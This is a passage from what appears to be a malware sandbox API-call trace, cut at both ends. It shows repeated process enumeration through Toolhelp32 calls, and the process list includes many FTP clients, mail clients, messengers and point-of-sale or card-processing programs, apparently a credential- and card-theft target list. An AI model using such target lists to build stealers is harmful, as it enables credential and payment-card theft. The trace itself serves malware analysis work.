th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0280.250] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0280.251] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0280.253] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0280.254] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0280.256] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0280.258] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0280.259] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0280.261] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0280.310] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0280.311] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0280.313] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0280.314] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0280.316] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0280.317] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0280.319] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0280.321] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0280.322] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0280.324] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0280.326] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0280.328] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0280.329] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0280.331] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0280.333] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0280.335] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0280.336] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0280.338] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0280.340] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0280.342] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0280.344] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0280.345] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0280.347] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0280.349] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0280.350] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0280.352] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0280.353] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0280.355] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0280.366] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0280.368] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0280.370] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0280.372] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0280.373] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0280.375] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0280.376] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0280.378] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0280.379] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0280.381] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0280.382] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0280.384] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0280.385] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0280.387] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0280.389] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0280.390] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0280.392] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.393] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0280.395] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0280.396] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0280.397] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0280.399] CloseHandle (hObject=0x2134) returned 1 [0280.399] Sleep (dwMilliseconds=0x64) [0280.613] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0280.625] Process32First (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.627] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0280.628] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0280.630] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.631] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0280.633] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.634] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0280.636] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0280.637] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0280.640] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.641] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.643] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0280.645] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.646] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.648] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.649] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.651] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.652] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.737] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.738] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0280.740] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0280.741] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0280.742] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.744] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0280.745] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0280.748] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, 